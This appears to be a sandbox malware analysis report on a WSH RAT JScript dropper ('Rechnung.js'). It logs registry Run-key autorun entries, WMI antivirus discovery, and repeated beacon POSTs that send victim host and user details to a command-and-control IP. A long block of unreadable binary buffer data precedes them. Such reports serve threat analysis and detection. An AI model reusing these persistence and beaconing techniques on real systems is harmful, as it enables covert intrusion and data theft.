Ùt¦DUóSG½lÍ¯]IhØ6k³8ww¿AiþáÖw¶G.Éû¦7ÚÕêÇY%?åÏÛøÍæ§´£«Rë&ím²s©oUmÜ¿wª¯:ÚÌb>ý+ÈÝîcvwnùOûÚGMû.f1Ã!¥ÎÖL{¦íBòÇÒáÉþZcûÕÖÔrvevÇìgØºú4ÝHÊ¶\|ö.÷ÝNøîé%½#°áXLitid?KÎôòJ'drí<y¦+å^Ù¤¤Ô+PJrÒÕ¯i$gDX`6ï[ÐÌ¬ÆÅaCµ}^Ü\|)S¦:N´ãY±Èxû2É%ØìÑÑ`?2ÈUêv$ñúlm·¨â1MWÄy-J]Øô±¢#së®rN sÆ¯ Ú¡ðå!,SÕ¤ÝS+_p=´éKµ£uáì¿<ÐçcÔý®×j¿>¸ûÇa òõIì%Nm)ãÙy}áµxÕêÄsyqó¦®HÔ½müÏ Ç²mÜ¥#ï>rÐ%íÑ\|÷ÓÒa×;íÜÐ4(÷Õ¥ño^-sPþ¸¼iÀ»Õ1nNÄ°yË/<Üs¹uà¡{AùÛùë&8å$÷Ù½rOAÇ±1.V³rçòUãÝ·~ÕïNÃâ÷i£ÖÚñù'»WÎ>ö¡ªØ¨b[«mjß±?w=RDÞÕÐ¦V±¼¤ request_handle: 0x00cc000c	1	1
InternetReadFile March 18, 2021, 12:06 a.m.	buffer: `üàÂw&¶²½¯ÉæÜ_¢¾Þå¥ NÊÅÞ%aÏÜ~í-[a gj ®T(¹¨´Tââ>ÍeCí¡ÇWJÙ#Ì3=T&åºYFï1%ÁbYÕrw >O/q55?ÀÂ×³ÒÅ&:oÔó#©/ãÓÛVYrîøá {7H·äº;n·Tïà;ÜM)@·:´L'Ì",PÆì¯àèü^9ÁoRÞcü¦þø ¼±ùxÁ#üy£âïûÿ ½¦\/ºÎvÓâ}õøDCÊå¼r%FåîÌn<'h£O=êôÅHÉðüX=yÉzÖ³z1`5v5¨¶1ðÁú95ÇçÌmù¥´Ú3j¯îîÈtbuétJ¢¦n?ºaþæì°¬Za@×ÔYY.ÜËWTq'Q8vîÝn~ÐìÜê)¥¹õ©äæ5ÕR{/ ]3#ba5Ë\|»ºíI$w þÐoéÛ(FÓ]zòîlåKNõ`7 k[ÂèyßCä2¼¢½bP¼úá6Z}Î zç F$óß¡÷OuðwèMø-z#jXìgðÝ`w¿)Æé{xÂ ÝóHS.%gä)8jm`pþcPÿO)wÄXÆ×ë¡HóÌæ¹u¸«(¸ìumpIr:{Upõ§ØUh"·Ñ(ÇxkVhÅS¿§äVºßéZ<ZÖ\|÷ÂøªÚéË9á3wú\|j§#×Ñ¹ýQæî³12Øí~ÜtãÂÛÂ·«"WzjíU"hÎÙ ?o¤'F{NlºÝ¹äawÀi·9ôÇ&Ã6]}SA¶ tÇ»]?f¡ÊGÒ³WÍ~xUéfª§"Ã>ß3xvSø©V '÷Ì¶@Æì»Èë¹ ½Ýk{±®¤&°ò¢»Rµmhá«8MR%SÛ^eéYN\|J ög]pUCìud¥NU7?<ôq§÷I: ÍJëS6'1ÐwIÍ±ÏUn\hãèú(0³]`¼¦3¯±òè]ÜWB¶Õ0't¢eúx-zyHPaéG5åVm÷¡×FUCÎ´U? $6Aá,Ð«¤+\|e\ê¦Ö+Á¥YáSíLù6<Äy#Y7©&yÅï}ÿørKüòÅ±-©mW³eóôùÌë!~®Þ"UÊÀw×Rë´}³°"@b¹ý>¾üs×ä«ûtD×þ_,î·V4â¾p øÀ·WOÁ¨(qTÀ¸q%ÉÎu³ÜÔÆïÙ2ï¿4ÁF¡pár8k¸)K X¨óó]¸à ítÎAZAMQPÃYGÕYSÇÐÔj ª:òñ $è×âB4Ñá§û ßí&¤0øÐýr»ZÞ0±uuü!¡ÂAH7øøíäsú CçwâÛ°ÚU×RGÛO¯n¾·HÄ:ôè¯\Ýæ·Ó#/Yßd¥H÷²»+'q ºg>$¸7áXÎä±VâJi¢¾ÄÚ:=ùlU&-á®çVÕÐÔòa[bï¾XU[¡²Ç éaú}¯]§;DzXµ§´>RÊWÏè0lRòr(å oX<kP. o²¼î___¹X{ZAXóàq'ÝÃ¢¾ã¹èd«ú¥ô"{Ê¯ÝùýdÍ±Nè¥VÂÚ-zlùÇi.jªºn¤Å¼ÖóÚçt6óSà.ñë¼¢CàÈ§UDÇúÛÃÏ÷0¾ã«ù·aóuÛ¸ù+hcNðñ@ÈÐQ\|9:YcÏÖã¯åØi#Rtç0þ(V®Y¨·ï°5)LbÌÜ¥_/°¢K¨@WZK@ z¹5}Î£¡ÔþõrFÝ0q}!¦fÁf{ldØóºÅüã¢ÁU7\ßØç¯õ Ìm¶çIi± ¯²=Û_¹½-ñðý²P[Q¡$ã@´Zp9Qÿý\|.«gûÃ)1$~;w"dâHçjEÓXyóêFü¤5CFõÄÏ>.Éå¨´[ÎvÏ¤_>¤§xN)y>¡»,[´^FZH©p¯ãV(òfCmW]è«îñ¨úÅMb§9'¤%²ò_V+ºk¼ y¨fö. HDM_=À.}]¨ AQÇÿÝ~¢êÌÑ~ÁÑ\¢ "# ÷Ý×½ôË=/ÈmQéîEåß»ËåÉå)u t]KîùÁÔZrôd8£a#èøú7î±ðãÆjÆQø¾UÄ#Ýú[û,Àü9¸i ÓtG¾Øç0"ð Bx>[ÈÐ/Åüôé}ÝÛ'Oó,ë'6Ò¹´.ö6'Î;[dëÀø.ÒÏù=°ÅÚq3ªizäräÆþ`.8k«Ap5õFE"Mn>&0[cf¾g¯¶îÂ(£¬´÷êíIp5IÌº1¡1ãÕ !¥(ÛøªAá¾sÐ¾FZÍÖ6bÙ:«.©#³±FW{Û÷Y]ëÂKP÷èÞÕæYÖ8;- ÒjÒRËâ¶àIá^ø9f¡Lø×Uß,5ÀÕ+µ¬§§ä®yÈ¢5Ð.¿}ùn©(:ÀìÊâÒº÷ ÷@Ëg¿éÈïøÜ"è ÚÉÌ¼àWaëNØ¡ãjÜ$l<djº~ÚNæÎñó±ñA çÎqBy8yyL9 SN@"hÂË5ûÎÞ»æYÉ¤5é T¶Aït:½û×ÙÉGAÍ pü½ü]ßNbr"¤Öõ±¹\½oäí}9#P}ÀTTùp\|ª¥&WmÖtÆ:ùJêGº%Ê\|=ºÑS·ÈÀ\|~ø~¹áj©y{§¯ÈjýôXìúL×$ÇÝ$¥a\¬âÊ-eîMæ}Þl²ôxÕûO§Ð-[#EÛ7¿«ÝZÏ=pêýÈEL_oùÄÙo'/_FÅz²E{³®xg©í¨áWn¸}Ä±Û_ç:D/N»ÓØÆé4þcxø2!ìbÎúZ¤Ñ§JÆ;Ll£Lxâsõgòî<:¡DâØø¼Bm¤å-`²:¼Õ>³p×ÙÂÙÊ4£ÛpTsWUá8¢ü°ÛÈ@à3¬°þø@à¼äèhïsï¨øÛñú?Aá¾²»yÙË},$¤ÈÜ- yéÎËÙ.7md½/MooÂ'ÉzÂö¥1gM#:8®øÕxaNp±gI°?I¿qQÁú4Æ»îº °}d{·\|iæ@Ûí~k²H¡f±ÅéÞXÍ>«?³qõùWj}ºWÊîëô½ä¼ìÄªìÅZ23õêjW4>?e¢ã}wõQF~ÎYö¾â¤)2ã×Å§k±µ½1ñ\|ù=WÕÝ\|48vçk¿¿\áÓÆÙÇËw¬8ÑôKÙtÏP_ <¶h¥àñ± RL³23vè:£hO p1"£?1$¾bßOqèßØÈß9ÿb\|p}5ZÃfSõ,ºE"ïé¾é'ùß""nQÖ?PÊóW!Ü/úv`ÀÂXØÁáB`0@ääVÈ RÈ/o¥,ÛÄÖØ[JYÛÄÔÌÐùº þ¥92ÀÒÑ\|sí2BU]?Ö\îÒÑ;Ã?Nduã¢£ùÌEL0¥ÓæeVÏ¤þnÊ¯ö°äÂc>ñ²qÄDOMÖtÖD4OðfÁÁHÏ{øl¦¼Ý£\§{×ÚÀT©u:g(WC²TdÌ1'ÄÁ²fAñGoðKèY§2R,C"ÚbgRä¤ÖÕr_Þ=Lt6¶¯G1úÞ: qX¸¨=¼Ð"`h1¢FÑÙoXW3îC0fÕïuV¥0èJzüõæ'´(ñ-³ß×Þê¾h÷¸<¯ÒAÎlçQê£Å,BéãòbË ô&Ùr±Ùú>Ïmä3 54 Í¤+EÞ{òoxäí¢Ûæ~ßÿA_Ï#ßá\|õbU9«I¢zBãÌõ¡!»þÝÃÎþ:þu5#xa! ¥Ë,¯Ëô-wÒIQAæËß¡iÄxlÍ©*n¸¢]öoÀY]ÄêÆs8£áÆÀÌÿüUQÈÇ4þr<Faé-÷y®ÙÅbM[f%é©9 Þ I±¼1´0P]éKö_> sMS#§T¦96ã!a$säïPª¿V¼)"§V>65c(Âö&£C@GT\NKY§XÃxUù{ÙëÁÚÈPO&{ét«éÞÆÑ3ñÑÎ 8)ÿ9ÖQ¿®)¾QÉpÙ÷y")P!(GOÿ¿¶H¸¿¨tq÷nÛÛEÛ¬hNÐÅI&íöèòW Q"×í/ü£ì·þ½Á\|W¬¬!¢èe¨îÏ¸$aZÃ³Äº[Pæ¹ÙOíÞèÚ= Io)lÛ P_'Ó{«é Ù¼ª¸H¶«ÒDLjGJøQ/¤H.¨eÖ<º2{O#ïÛ¹zm1·ÎÂ`dëÑÓó:%)\|M9åoÍQ GÜBèÏ¦p¹¦â;\¸þÄ{êiæÊ®Ô´ÿ¢¤ÁkM®Á¶¦½eRár^+©ä$ZÈEÅauÃéç[á.å\|bcú<Zw8>X:7¢½Éì¢NE¾¼»n Ê\Oh7FK0ïy²{oðTÇN§W´ÙZ DH}t&áAÔ}÷#LB¨¢F¡ü«ÑqNB¡á vÄØ"Ö èhÝüÑµ66 è':ø)7V request_handle: 0x00cc000c	1	1

Installs itself for autorun at Windows startup (32 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Rechnung	reg_value	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"

Executes one or more WMI queries (3 events)

wmi	select * from antivirusproduct
wmi	select * from win32_operatingsystem
wmi	select * from win32_logicaldisk

wscript.exe-based dropper (JScript, VBS) (17 events)

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (50 out of 1050 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 4194304 http_method: GET referer: path: /json/	1	13369356
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
send March 18, 2021, 12:05 a.m.	buffer: GET /json/ HTTP/1.1 Accept: / Accept-Language: ko User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Encoding: gzip, deflate Host: ip-api.com Connection: Keep-Alive socket: 1108 sent: 259	1	259
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
InternetCrackUrlA March 18, 2021, 12:05 a.m.	url: http://ip-api.com/json/ flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
send March 18, 2021, 12:05 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 18/3/2021\|JavaScript-v3.4\|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1124 sent: 331	1	331
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
send March 18, 2021, 12:05 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 18/3/2021\|JavaScript-v3.4\|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1148 sent: 331	1	331
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
send March 18, 2021, 12:05 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 18/3/2021\|JavaScript-v3.4\|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1148 sent: 331	1	331
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
send March 18, 2021, 12:05 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 18/3/2021\|JavaScript-v3.4\|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 748 sent: 331	1	331
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
send March 18, 2021, 12:05 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 18/3/2021\|JavaScript-v3.4\|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 748 sent: 331	1	331
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
send March 18, 2021, 12:05 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 18/3/2021\|JavaScript-v3.4\|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 416 sent: 331	1	331
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
send March 18, 2021, 12:05 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 18/3/2021\|JavaScript-v3.4\|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 416 sent: 331	1	331
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
send March 18, 2021, 12:05 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 18/3/2021\|JavaScript-v3.4\|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 416 sent: 331	1	331
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
InternetCrackUrlW March 18, 2021, 12:05 a.m.	url: http://79.134.225.94:5200/is-ready flags: 0	1	1
HttpOpenRequestW March 18, 2021, 12:05 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /is-ready	1	13369356
send March 18, 2021, 12:05 a.m.	buffer: ! socket: 1012 sent: 1	1	1
send March 18, 2021, 12:05 a.m.	buffer: POST /is-ready HTTP/1.1 Accept: / Accept-Language: ko User-Agent: WSHRAT\|7C6024AD\|TEST22-PC\|test22\|Microsoft Windows 7 Professional KN \|plus\|nan-av\|false - 18/3/2021\|JavaScript-v3.4\|KR:South Korea Accept-Encoding: gzip, deflate Host: 79.134.225.94:5200 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 416 sent: 331	1	331

One or more non-whitelisted processes were created (2 events)

parent_process	wscript.exe				martian_process	"C:\Windows\System32\wscript.exe" //B "C:\Users\test22\AppData\Roaming\Rechnung.js"
parent_process	wscript.exe				martian_process	wscript.exe //B "C:\Users\test22\AppData\Roaming\Rechnung.js"

Drops 146 unknown file mime types indicative of ransomware writing encrypted files back to disk (50 out of 146 events)

file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\weakref.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\nturl2path.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\lzma.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\encodings\__pycache__\latin_1.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\collections\__pycache__\abc.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\types.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\ctypes\__pycache__\util.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\posixpath.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\__pycache__\__init__.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\examples\__pycache__\db_table_names.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\copyreg.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\_compression.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\examples\__pycache__\xls_read.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\socketserver.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\io.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\token.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\examples\__pycache__\xls_write.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\ctypes\__pycache__\wintypes.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\signal.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\copy.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\pprint.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\shlex.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\_bootlocale.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\_markupbase.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\_collections_abc.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\__pycache__\process_connect_string.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\dis.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\test\__pycache__\tryconnection2.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\DLLs\python_lib.cat
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\encodings\__pycache__\__init__.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\uu.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\quopri.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\__pycache__\easy_install.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\textwrap.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\calendar.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\tempfile.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\examples\__pycache__\db_print.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\functools.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\py_compile.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\abc.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\heapq.cpython-37.pyc
file	C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\cgi.cpython-37.pyc
